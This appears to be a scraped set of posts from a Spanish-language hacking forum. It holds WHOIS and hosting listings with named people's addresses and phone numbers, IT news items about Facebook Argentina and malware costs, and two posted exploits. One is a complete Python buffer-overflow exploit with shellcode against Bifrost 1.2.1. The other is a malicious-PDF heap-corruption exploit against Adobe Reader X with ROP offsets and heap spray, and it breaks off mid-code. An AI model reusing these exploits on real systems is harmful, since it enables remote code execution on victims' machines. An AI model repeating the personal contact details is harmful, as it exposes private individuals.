cursoslopd.es   109.205.136.11
juliocesar.biz   109.205.136.11
pcapunto.com   109.205.136.11
inoutconsulting.es   109.205.136.12
sercseurty.com   109.205.136.15
subserversecurty.com   109.205.136.15
sdfaildserver.com   109.205.136.15
puigpey.com   109.205.136.19
sallentassessors.com   109.205.136.19
autotradecenter.es   109.205.136.19
bcnfashionchannel.com   109.205.136.19
danielbartolome.com   109.205.136.19
external websiteSee more items

Top IPs with hosting
IP address   #domains   Example
109.205.137.75   345   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,santiagocatalan.com
109.205.140.116   327   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,gestioip.net
109.205.137.65   316   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,helicicultura.es
109.205.138.43   242   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,orthos.es
109.205.137.192   150   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,lolacasariego.com
109.205.137.179   125   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,expiracion.org
109.205.137.177   108   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,masseabogados.com
109.205.136.42   102   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,terranuestra.com
109.205.137.182   101   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,xabier.org
109.205.137.232   92   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,aluminioscampos.net
109.205.137.181   89   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,andreascalvo.com
109.205.138.19   88   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,webcond.com
109.205.137.135   85   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,tutallernatural.com
109.205.138.70   83   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,espalpsp.com
109.205.137.228   82   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,unikornio.net
external websiteSee more items

Mail servers hosted on as196929
Mail server   IPv4 Address   #domains
dedi.vacolba.es   109.205.136.30   3
iutomares.org   109.205.137.75   1
nomelades.com   109.205.136.149   1
tomaspuig.com   109.205.137.75   1
alcazaropticos.com   109.205.136.19   1
limpiezas-sanfroilan.com   109.205.137.75   1
mail.naeko.net   109.205.136.19   1
cadizdirecto.com   109.205.138.19   1
creacionestelar.com   109.205.136.19   1
espalwii.com   109.205.138.70   1
sonet.com.es   109.205.136.42   1
jcmari.com   109.205.138.50   1
cochesiniestrado.com   109.205.136.42   1
conigliox.com   109.205.138.21   1
andromines.net   109.205.137.181   1
external websiteSee more items

Name servers hosted on as196929
Name server   IPv4 Address   #domains
ns3.hostigal.com   109.205.137.192   608
ns4.hostigal.com   109.205.137.177   608
ns1.dominioanonimo.com   109.205.137.75   320
ns2.dominioanonimo.com   109.205.137.76   320
ns2.servidorneptuno.com   109.205.137.66   288
ns1.servidorneptuno.com   109.205.137.65   288
ns1.servidormercurio.com   109.205.140.116   140
ns2.servidormercurio.com   109.205.140.117   140
ns1.hostigal.com   109.205.137.232   115
ns2.hostigal.com   109.205.137.232   115
ns3.lugointernet.com   109.205.140.116   109
ns4.lugointernet.com   109.205.140.117   109
ns3.sonet.com.es   109.205.136.12   108
ns1.sonet.com.es   109.205.136.111   108
ns2.ahorrahosting.com   109.205.136.187   106
external websiteSee more items

Whois information
aut-num   AS196929
as-name   GESTIONCLIENTES-Network
org   ORG-PAJL1-RIPE
admin-c   DPG4-RIPE
tech-c   DPG4-RIPE
mnt-by   RIPE-NCC-END-MNT
mnt-by   MNT-GESTIONCLIENTES
mnt-routes   MNT-GESTIONCLIENTES
source   RIPE # Filtered
organisation   ORG-PAJL1-RIPE
org-name   PEREZ ARNAIZ JOSE LUIS 002479762A, SLNE
org-type   LIR
address   AlquiHosting, SL
phone   +34979105741
fax-no   +34979105741
admin-c   DPG4-RIPE
mnt-ref   MNT-GESTIONCLIENTES
mnt-by   RIPE-NCC-HM-MNT
source   RIPE # Filtered
person   Daniel Perez Gutierrez
address   Cl Miguel Hernandez 38
phone   +34 979 105 741
nic-hdl   DPG4-RIPE
mnt-by   mnt-gestionclientes
source   RIPE # Filtered
Country information (Spain)
Country   Spain
Capital   Madrid
Continent   EU
Population   46,505,963
Area   504,782 km²
Currency   EUR

=================================
Dominios

Domain name information
Domain name   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Domain suffix   com
Top-level domain (TLD)   com

Ranking
Current ranking Alexa   7,070
Highest ranking Alexa   2,683 (2013-07-07)
Current ranking Quantcast   not in top million
Highest ranking Quantcast   never ranked
Google PageRank   3

HTML information
HTML doctype   -//W3C//DTD XHTML 1.0 Transitional//EN
HTML charset   iso-8859-1
W3C warnings   275
W3C errors   1593
HTML tools   external website W3C Validator You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
external website Keyword Analysis You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

WOT Reputation
Trustworthiness   Excellent (82)
Child safety   Very Poor (18)
Social media
Google +1 Button clicks   45
Facebook activity   Shares: 5685
Likes: 1648
Comments: 4665
Total: 11998
Number of tweets   44

Registrant:
Soluciones Telematicas MOL SL
c/petrarca 63 atico 1
Barcelona, Barcelona 08031
ES
+34.637512829
Domain Name: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Administrative Contact:
Ortiz Luque, Miguel You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
c/petrarca 63 atico 1
Barcelona, Barcelona 08031
ES
+34.637512829
Technical Contact:
Ortiz Luque, Miguel You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
c/petrarca 63 atico 1
Barcelona, Barcelona 08031
ES
+34.637512829
Record last updated 03-30-2011 04:21:46 PM
Record expires on 04-10-2014
Record created on 04-10-2001
Domain servers in listed order:
NS1.HOSTINGRAPIDO.COM   174.36.98.176
NS2.HOSTINGRAPIDO.COM   72.232.42.210
NS3.HOSTINGRAPIDO.COM   174.36.98.177

=================================

#94

Noticias Informáticas / Todo lo que tenés que saber sobre Facebook Argentina antes de la inauguración

Mayo 06, 2014, 09:07:04 PM

Todo lo que tenés que saber sobre Facebook Argentina antes de la inauguración de las nuevas oficinas

Hoy la Presidenta estará presente para inaugurar las oficinas de la red social en Buenos Aires. ¿Quién lidera en Argentina y para qué abrieron la sede local? Mirá las fotos de la oficina

Facebook es la red social más grande del mundo. Tiene más de mil millones de usuarios en todo el globo que lo usan a diario, suben sus fotografías y comparten sus pensamientos a través del sitio y, como no puede ser de otra manera, hace tiempo que empezó a abrir sedes en diferentes partes del mundo y la Argentina fue elegida para sus propias oficinas.

Oficina de Facebook en Argentina

La red social fue inscrita en la Inspección General del justicia (IGJ) a fines de 2011 y abrió sus oficinas tiempo después. Hoy, en un acto que se realizará a las 19h, la Presidenta será la encargada de cortar la cinta y darle bienvenida a la red social.

La oficina, que tiene un gigantesco panel en la entrada donde empleados y visitantes pueden dejar mensajes escritos en él, se encuentra ubicada en el séptimo piso del edificio República, que fue ideado y llevado a cabo por el arquitecto César Pelli y allí trabajan alrededor de 30 personas y es la tercera oficina que tiene en el Cono Sur, después de Brasil y México.

Todo está conducido por Alejandro Zuzenberg, el representante de la red social en el país, quien trabajó con Google y se trata del Director Comercial de la empresa y que se encarga de atender desde el país a posibles clientes de Chile, Colombia, Paraguay y Uruguay.

Zuzenberg, además de haber trabajado nada menos que en Google, fundó POSIP, una compañía que provee aplicaciones para puntos de venta basadas en tecnología web. Esto le permite a diferentes sucursales estar conectadas entre ellas con información en tiempo real (especial para venta al público, call centers, etc.).

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Fuente ; You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#95

Noticias Informáticas / Qué especialistas buscan en Facebook Argentina?

Mayo 06, 2014, 09:04:43 PM

La compañía está contratando expertos para su plantilla. Desde líderes en medición hasta ejecutivo de ventas. ¿Creés que tu perfil encaja en la búsqueda?

Facebook abrió sus oficinas en la Argentina hace tiempo y este martes se realizó la inauguración oficial con presencia de la presidenta Cristina Kirchner. En la sede local de la red social más grande del mundo ya trabajan alrededor de 30 personas, pero eso no significa que el equipo esté completo. Por este motivo, a través del sitio You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login se informa que, al menos por ahora, hay siete expertos que todavía faltan ser encontrados.

Éstos son los trabajos que están disponibles en la red social para su sede en Argentina:

Mánager de Asistencia al Cliente
Líder de Medición
Client Partner - Ejecutivo de Ventas
Mánager de Desarrollo de Negocios
Ejecutivo de Cuentas de Pequeños Negocios
Jefe de Comunicaciones para América Latina
Gerente de Negocios Global de Mercados Emergentes

Fuente ; You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#96

Noticias Informáticas / El cibercrimen costará 491.000 millones de dólares en 2014

Mayo 05, 2014, 11:45:15 PM

Según la consultora IDC, el 61% de los ordenadores con 'software' pirata está infectado por software malicioso ('malware') y el 27% de los trabajadores instala 'software' de todo tipo en sus dispositivos sin la supervisión de sus compañías.

Microsoft ha hecho públicos los resultados del estudio realizado por la consultora IDC y la Universidad Nacional de Singapur, que estima que en 2014 las empresas gastarán cerca de 491.000 millones de dólares por problemas de seguridad asociados a la presencia de software malicioso (malware) presente en software pirateado.

La precisión y meticulosidad de los ataques a través de la web no han dejado de evolucionar rápidamente mediante técnicas cada vez más avanzadas y peligrosas. Por este motivo es muy importante que los usuarios y compañías dispongan de software auténtico en sus equipos, que les permita prevenir y evitar pérdidas económicas y daños en su imagen. Entre las principales conclusiones que se desprenden del estudio, realizado por IDC y la Universidad Nacional de Singapur a nivel mundial, destacan:
Los consumidores y las empresas tienen una posibilidad entre tres de tener que enfrentarse a la presencia en sus sistemas de malware, asociado a la instalación de software pirata en sus equipos o a través de la compra de PCs con software pirata preinstalado.
IDC estima que en 2014 las empresas gastarán cerca de 491.000 millones de dólares debido al malware presente en el software pirateado, que incluye: 127.000 millones de dólares para gestionar problemas de seguridad y 364.000 millones de dólares para gestionar la exposición de datos privados y brechas de seguridad.
Un 30% de las personas que reconocen usar software pirata apunta que sufren problemas de seguridad.
"Los ciberdelincuentes aprovechan la más mínima debilidad, en lo que a términos de seguridad se refiere, y esto tiene graves consecuencias económicas", ha asegurado David Finn, director del Centro de Ciberdelincuencia (Cybercrime Center) de Microsoft. "Se han descubierto nuevas formas de utilizar las redes de ordenadores para cualquier tipo de robo: identidad, contraseña, dinero, etc. Por este motivo el Cybercrime Center de Microsoft trabaja diariamente para poner fin a estas situaciones y mantener a salvo y segura la información personal y financiera de nuestros clientes."

El estudio de IDC y la Universidad Nacional de Singapur insiste una vez más en los peligros de las descargas y las compras de software no legítimo, ya que expone a los dispositivos a programas espía, malware y virus, que pueden conducir al robo de identidad, pérdida de datos o a causar graves fallos en los sistemas.

"Usar software pirata es como caminar por un campo de minas, nunca sabes cuando puede 'estallar' el problema y provocar un desastre", ha afirmado John Gantz, jefe de investigación de IDC. "Los riesgos financieros son considerables y las pérdidas potenciales pueden conducir a grandes empresas a sufrir graves problemas. Comprar software legítimo resulta ser menos costoso en el largo plazo, ya que proporciona seguridad para evitar "sorpresas" en forma de software malicioso no deseado".

El análisis forense, realizado por la Universidad Nacional de Singapur en 203 ordenadores nuevos a los que se les instaló software pirata, detectó que el 61 por ciento de los equipos se encontraba infectado por troyanos, gusanos, virus, rootkits o adware. Además, la investigación de IDC detectó que el 27 por ciento de los trabajadores encuestados instala habitualmente software en los dispositivos de sus empresas sin el conocimiento ni la supervisión de éstas, lo que incrementa el riesgo de infección por malware en los sistemas corporativos.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#97

Bugs y Exploits / Re:Bifrost 1.2.1 - Remote Buffer OverFlow Vulnerability

Julio 10, 2013, 12:31:16 AM

Aver el post es de un exploit que tenia aca yo dando vueltas, Le puse "Underc0de" Pido disculpas si Ofendi a alguien -.-!"

#98

Bugs y Exploits / Bifrost 1.2.1 - Remote Buffer OverFlow Vulnerability

Julio 09, 2013, 06:12:13 PM

============================
Date add:   2013-07-01
Category:   remote exploits
Verified:   Not verified yet Not verified yet
Platform:   Windows
============================

Código: python

#!/usr/bin/python2.7
#By : Mohamed Clay
import socket
from time import sleep
from itertools import izip, cycle
import base64
import sys
 
def rc4crypt(data, key):
    x = 0
    box = range(256)
    for i in range(256):
        x = (x + box[i] + ord(key[i % len(key)])) % 256
        box[i], box[x] = box[x], box[i]
    x = 0
    y = 0
    out = []
    for char in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
     
    return ''.join(out)
 
def bif_len(s):
    while len(s)<8:
         s=s+"00"
    return s
 
def header(s):
      a=(s[0]+s[1]).decode("hex")
      a+=(s[2]+s[3]).decode("hex")
      a+=(s[4]+s[5]).decode("hex")
      a+=(s[5]+s[6]).decode("hex")
      return a
 
def random():    
    a=""
    for i in range(0,8):
        a+="A"*1000+"|"
    return a
 
def usage():
 
   print "\n\n\t***************************"
   print "\t*    By : Mohamed Clay    *"
   print "\t*  Bifrost 1.2.1 Exploit  *"
   print "\t***************************\n"
   print "\t  Usage : ./bifrost1.2.1 host port"
   print "\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n"
 
 
if len(sys.argv)!=3:
    usage()
    exit()
 
HOST=sys.argv[1]
PORT=int(sys.argv[2])
 
key="\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"
 
xor="\xB2\x9C\x51\xBB" # we need this in order to bypass 0046A03E function
eip="\x53\x93\x3A\x7E" # jmp esp User32.dll
 
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
 
#calc.exe shellcode (badchars "\x00")
 
buf ="\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9"
buf +="\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44"
buf +="\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca"
buf +="\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8"
buf +="\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26"
buf +="\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d"
buf +="\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82"
buf +="\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45"
buf +="\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59"
buf +="\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89"
buf +="\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09"
buf +="\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55"
buf +="\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10"
buf +="\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1"
buf +="\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c"
buf +="\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95"
buf +="\xe1\x93\x28"
 
 
raw=(1000-533-len(egghunter))*"\x90"
raw2=(1000-8-len(buf))*"\x41"+"|"
command=30
 
tmp=hex(command).split("0x")[1]
data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*8+eip+"A"*12+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random()
out=rc4crypt(data,key)
l=header(bif_len(str(hex(len(data))).split("0x")[1]))
out=l+out
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(out)
print "\n[*] By : Mohamed Clay"
print "[*] Exploit completed\n"

#99

Bugs y Exploits / Adobe Reader X 10.1.4.38 - BMP/RLE Heap Corruption Vulnerability

Julio 09, 2013, 06:03:16 PM

=================================
Date add:   2013-07-08
Verified:   VerifiedVerified
Risk:   <font color="#FFFF00">Security Risk Medium</font>
Platform:   Windows
=================================

Código: text

'''
Title: Adobe Reader X BMP/RLE heap corruption
Product: Adobe Reader X
Version: 10.x
Product Homepage: adobe.com
Binary affected: AcroForm.api
Binary Version: 10.1.4.38
Binary MD5: 8e0fc0c6f206b84e265cc3076c4b9841
Configuration Requirements
-----------------------------------------
Default configuration.
  
Vulnerability Requirements
-----------------------------------------
None.
  
Vulnerability Description
-----------------------------------------
Adobe Reader X fails to validate the input when parsing an embedded BMP RLE encoded image. Arbitrary code execution in the context of the sandboxed process is proved possible after a malicious embeded bmp image triggers a heap overflow.
  
  
Vulnerability WorkAround (if possible)
-----------------------------------------
Delete AcroForm.api
'''
from hashlib import md5
import sys, struct
######### Begin of the miniPDF
import zlib
  
#For constructing a minimal pdf file
## PDF REference 3rd edition:: 3.2 Objects
class PDFObject:
    def __init__(self):
        self.n=None
        self.v=None
    def __str__(self):
        raise Exception("Fail")
  
## PDF REference 3rd edition:: 3.2.1 Booleans Objects
class PDFBool(PDFObject):
    def __init__(self,s):
        PDFObject.__init__(self)
        self.s=s
    def __str__(self):
        if self.s:
            return "true"
        return "false"
  
## PDF REference 3rd edition:: 3.2.2 Numeric Objects
class PDFNum(PDFObject):
    def __init__(self,s):
        PDFObject.__init__(self)
        self.s=s
    def __str__(self):
        return "%s"%self.s
  
## PDF REference 3rd edition:: 3.2.3 String Objects
class PDFString(PDFObject):
    def __init__(self,s):
        PDFObject.__init__(self)
        self.s=s
    def __str__(self):
        return "(%s)"%self.s
  
## PDF REference 3rd edition:: 3.2.3 String Objects / Hexadecimal Strings
class PDFHexString(PDFObject):
    def __init__(self,s):
        PDFObject.__init__(self)
        self.s=s
    def __str__(self):
        return "<" + "".join(["%02x"%ord(c) for c in self.s]) + ">"
  
## A convenient type of literal Strings
class PDFOctalString(PDFObject):
    def __init__(self,s):
        PDFObject.__init__(self)
        self.s="".join(["\\%03o"%ord(c) for c in s])
    def __str__(self):
        return "(%s)"%self.s
  
## PDF REference 3rd edition:: 3.2.4 Name Objects
class PDFName(PDFObject):
    def __init__(self,s):
        PDFObject.__init__(self)
        self.s=s
    def __str__(self):
        return "/%s"%self.s
  
## PDF REference 3rd edition:: 3.2.5 Array Objects
class PDFArray(PDFObject):
    def __init__(self,s):
        PDFObject.__init__(self)
        assert type(s) == type([])
        self.s=s
    def append(self,o):
        self.s.append(o)
        return self
    def __str__(self):
        return "[%s]"%(" ".join([ o.__str__() for o in self.s]))
  
## PDF REference 3rd edition:: 3.2.6 Dictionary Objects
class PDFDict(PDFObject):
    def __init__(self, d={}):
        PDFObject.__init__(self)
        self.dict = {}
        for k in d:
            self.dict[k]=d[k]
  
    def __iter__(self):
        for k in self.dict.keys():
            yield k
  
    def __iterkeys__(self):
        for k in self.dict.keys():
            yield k
  
    def __getitem__(self, key):
        return self.dict[key]
          
    def add(self,name,obj):
        self.dict[name] = obj
  
    def get(self,name):
        if name in self.dict.keys():
            return self.dict[name]
        else:
            return None
  
    def __str__(self):
        s="<<"
        for name in self.dict:
            s+="%s %s "%(PDFName(name),self.dict[name])
        s+=">>"
        return s
  
## PDF REference 3rd edition:: 3.2.7 Stream Objects
class PDFStream(PDFDict):
    def __init__(self,d={},stream=""):
        PDFDict.__init__(self,d)
        self.stream=stream
        self.filtered=self.stream
        self.add('Length', len(stream))
        self.filters = []
  
    def appendFilter(self, filter):
        self.filters.append(filter)
        self._applyFilters() #yeah every time .. so what!
  
    def _applyFilters(self):
        self.filtered = self.stream
        for f in self.filters:
                self.filtered = f.encode(self.filtered)
        if len(self.filters)>0:
            self.add('Length', len(self.filtered))
            self.add('Filter', PDFArray([f.name for f in self.filters]))
        #Add Filter parameters ?
    def __str__(self):
        self._applyFilters() #yeah every time .. so what!
        s=""
        s+=PDFDict.__str__(self)
        s+="\nstream\n"
        s+=self.filtered
        s+="\nendstream"
        return s
  
## PDF REference 3rd edition:: 3.2.8 Null Object
class PDFNull(PDFObject):
    def __init__(self):
        PDFObject.__init__(self)
  
    def __str__(self):
        return "null"
  
  
## PDF REference 3rd edition:: 3.2.9 Indirect Objects
class UnResolved(PDFObject):
    def __init__(self,n,v):
        PDFObject.__init__(self)
        self.n=n
        self.v=v
    def __str__(self):
        return "UNRESOLVED(%d %d)"%(self.n,self.v)
class PDFRef(PDFObject):
    def __init__(self,obj):
        PDFObject.__init__(self)
        self.obj=[obj]
    def __str__(self):
        if len(self.obj)==0:
            return "null"
        return "%d %d R"%(self.obj[0].n,self.obj[0].v)
  
## PDF REference 3rd edition:: 3.3 Filters
## Example Filter...
class FlateDecode:
    name = PDFName('FlateDecode')
    def __init__(self):
        pass
    def encode(self,stream):
        return zlib.compress(stream)
    def decode(self,stream):
        return zlib.decompress(stream)
  
## PDF REference 3rd edition:: 3.4 File Structure
## Simplest file structure...
class PDFDoc():
    def __init__(self,obfuscate=0):
        self.objs=[]
        self.info=None
        self.root=None
    def setRoot(self,root):
        self.root=root
    def setInfo(self,info):
        self.info=info
    def _add(self,obj):
        if obj.v!=None or obj.n!=None:
            raise Exception("Already added!!!")
        obj.v=0
        obj.n=1+len(self.objs)
        self.objs.append(obj)
    def add(self,obj):
        if type(obj) != type([]):
            self._add(obj);       
        else:
            for o in obj: 
                self._add(o)
    def _header(self):
        return "%PDF-1.5\n%\xE7\xF3\xCF\xD3\n"
    def __str__(self):
        doc1 = self._header()
        xref = {}
        for obj in self.objs:
            xref[obj.n] = len(doc1)
            doc1+="%d %d obj\n"%(obj.n,obj.v)
            doc1+=obj.__str__()
            doc1+="\nendobj\n"
        posxref=len(doc1)
        doc1+="xref\n"
        doc1+="0 %d\n"%(len(self.objs)+1)
        doc1+="0000000000 65535 f \n"
        for xr in xref.keys():
            doc1+= "%010d %05d n \n"%(xref[xr],0)
        doc1+="trailer\n"
        trailer =  PDFDict()
        trailer.add("Size",len(self.objs)+1)
        if self.root == None:
            raise Exception("Root not set!")
        trailer.add("Root",PDFRef(self.root))
        if self.info:
            trailer.add("Info",PDFRef(self.info))
        doc1+=trailer.__str__()
        doc1+="\nstartxref\n%d\n"%posxref
        doc1+="%%EOF"
        return doc1
######### End of miniPDF
  
SLIDESIZE=0x12C
  
def mkBMP(payload, exception=True):
    bmp = ''
    #getInfoHeader
    bfType = 0x4d42
    assert bfType in [0x4d42,0x4349,0x5043,0x4943,0x5043] #0x4142: not supp
    bmp += struct.pack('<H', bfType)
  
    bfSize = 0
    bfOffBits = 0
    bmp += struct.pack('<L', bfSize)
    bmp += struct.pack('<H', 0) #Reserved1
    bmp += struct.pack('<H', 0) #Reserved2
    bmp += struct.pack('<L', bfOffBits)
  
  
    biSize = 0x40
    assert not biSize in [0x12]
    bmp += struct.pack('<L', biSize)
  
  
    biHeight = 1
    biWidth = SLIDESIZE  #size of texture structure LFH enabled
    biPlanes = 1
    biBitCount = 8
    biCompression = 1
    biSizeImage = 0
    biXPelsPerMeter = 0
    biYPelsPerMeter = 0
    biClrUsed = 2
    if biClrUsed >0xff:
        raise "BUG!!!!"
  
    biClrImportant = 0
    bmp += struct.pack('<L', biWidth)
    bmp += struct.pack('<L', biHeight)
    bmp += struct.pack('<H', biPlanes)
    bmp += struct.pack('<H', biBitCount)
    bmp += struct.pack('<L', biCompression)
    bmp += struct.pack('<L', biSizeImage)
    bmp += struct.pack('<L', biXPelsPerMeter)
    bmp += struct.pack('<L', biYPelsPerMeter)
    bmp += struct.pack('<L', biClrUsed)
    bmp += struct.pack('<L', biClrImportant)
    bmp += 'A'*(biSize-0x40) #pad
  
    numColors=biClrUsed
    if biClrUsed == 0 or biBitCount < 8:
        numColors = 1<<biBitCount;
  
    bmp += 'RGBA'*(numColors) #pallete
  
    bmp += '\x00\x02\xff\x00' * ((0xffffffff-0xff) / 0xff)
  
    #while (len(bmp)+10)%0x400 != 0:
    #    bmp += '\x00\x02\x00\x00'
  
    assert len(payload) < 0x100 and len(payload) >= 3
  
  
    bmp += '\x00\x02'+chr(0x100-len(payload))+'\x00'
    bmp += '\x00'+chr(len(payload))+payload
  
    if len(payload)&1 :
        bmp += 'P'
  
    if exception:
        bmp += '\x00\x02\x00\xff'*10    #getting the pointer outside the texture so it triggers an exception
        bmp += '\x00'+chr(10)+'X'*10
    else:
        bmp += '\x00\x01'
        #'\x04X'*(biWidth+2000)+"\x00\x02"
    return bmp
  
def UEncode(s):
    r = ''
    s += '\x00'*(len(s)%2)
    for i in range(0,len(s),2):
        r+= '\\u%04x'%(struct.unpack('<H', (s[i:i+2]))[0])
    return r
    r = ''
    for c in s:
        r+= '%%%02x'%ord(c)
    return r
  
  
def mkXFAPDF(shellcode = '\x90'*0x400+'\xcc'):
    xdp = '''
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" timeStamp="2012-11-23T13:41:54Z" uuid="0aa46f9b-2c50-42d4-ab0b-1a1015321da7">
<template xmlns:xfa="http://www.xfa.org/schema/xfa-template/3.1/" xmlns="http://www.xfa.org/schema/xfa-template/3.0/">
   <?formServer defaultPDFRenderFormat acrobat9.1static?>
   <?formServer allowRenderCaching 0?>
   <?formServer formModel both?>
   <subform name="form1" layout="tb" locale="en_US" restoreState="auto">
      <pageSet>
         <pageArea name="Page1" id="Page1">
            <contentArea x="0.25in" y="0.25in" w="576pt" h="756pt"/>
            <medium stock="default" short="612pt" long="792pt"/>
            <?templateDesigner expand 1?>
         </pageArea>
         <?templateDesigner expand 1?>
      </pageSet>
      <variables>
         <script name="util" contentType="application/x-javascript">
            // Convenience functions to pack and unpack litle endian an utf-16 strings
            function pack(i){
                var low = (i & 0xffff);
                var high = ((i>>16) & 0xffff);
                return String.fromCharCode(low)+String.fromCharCode(high);
            }
            function unpackAt(s, pos){
                return  s.charCodeAt(pos) + (s.charCodeAt(pos+1)<<16);
            }
            function packs(s){
                result = "";
                for (i=0;i<s.length;i+=2)
                    result += String.fromCharCode(s.charCodeAt(i) + (s.charCodeAt(i+1)<<8));
                    return result;
                }
            function packh(s){
                return String.fromCharCode(parseInt(s.slice(2,4)+s.slice(0,2),16));
                }
            function packhs(s){
                result = "";
                for (i=0;i<s.length;i+=4)
                result += packh(s.slice(i,i+4));
                return result;
            }
            var verbose = 1;
            function message(x){
               if (util.verbose == 1 )
                  xfa.host.messageBox(x);
            }
  
//ROP0
//7201E63D    XCHG EAX,ESP
//7201E63E    RETN
//ROP1
//7200100A    JMP DWORD PTR DS:[KERNEL32.GetModuleHandle]
//ROP2
//7238EF5C    PUSH EAX
//7238EF5D    CALL DWORD PTR DS:[KERNEL32.GetProcAddress]
//7238EF63    TEST EAX,EAX
//7238EF65    JNE SHORT 7238EF84
//7238EF84    POP EBP
//7238EF85    RETN 4
//ROP3
//72001186    JMP EAX       ; kernel32.VirtualProtect
//ROP4
//72242491    ADD ESP,70
//72242494    RETN
  
  
            var _offsets =  {'Reader": { "10.104": {
                                                    "acrord32":    0xA4,
                                                    "rop0":        0x1E63D,
                                                    "rop1":        0x100A,
                                                    "rop2":        0x38EF5C,
                                                    "rop3":        0x1186,
                                                    "rop4":        0x242491,
                                                    },
                                          "10.105": { // Added by Eddie Mitchell
                                                    "acrord32":    0xA5,
                                                    "rop0":        0x1E52D,
                                                    "rop1":        0x100A,
                                                    "rop2":        0x393526,
                                                    "rop3":        0x1186,
                                                    "rop4":        0x245E71,
                                                    },
                                          "10.106": { // Added by Eddie Mitchell
                                                    "acrord32":    0xA5,
                                                    "rop0":        0x1E52D,
                                                    "rop1":        0x100A,
                                                    "rop2":        0x393526,
                                                    "rop3":        0x1186,
                                                    "rop4":        0x245E71,
                                                    },
                                       },
                            "Exchange-Pro": {
                                          "10.105": { // Added by Eddie Mitchell
                                                    "acrobat":    0xCD,
                                                    "rop0":        0x3720D,
                                                    "rop1":        0x100A,
                                                    "rop2":        0x3DCC91,
                                                    "rop3":        0x180F,
                                                    "rop4":        0x25F2A1,
                                                     },
                                             },
                            };
  
            function offset(x){
                //app.viewerType will be "Reader" for Reader,
                //"Exchange" for Acrobat Standard or "Exchange-Pro" for Acrobat Pro
                try {
                      return _offsets[app.viewerType][app.viewerVersion][x];
                }
                catch (e) {
                   xfa.host.messageBox("Type:" +app.viewerType+ " Version: "+app.viewerVersion+" NOT SUPPORTED!");
                }
                return 0x41414141;
            }
  
         </script>
         <script name="spray" contentType="application/x-javascript">
            // Global variable for spraying
            var slide_size=%%SLIDESIZE%%;
            var size = 200;
            var chunkx = "%%MINICHUNKX%%";
            var x = new Array(size);
            var y = new Array(size);
            var z = new Array(size);
            var pointers = new Array(100);
            var done = 0;
         </script>
         <?templateDesigner expand 1?>
      </variables>
      <subform w="576pt" h="756pt">
         <!-- This image fiel hold the cashing image -->
         <field name="ImageCrash">
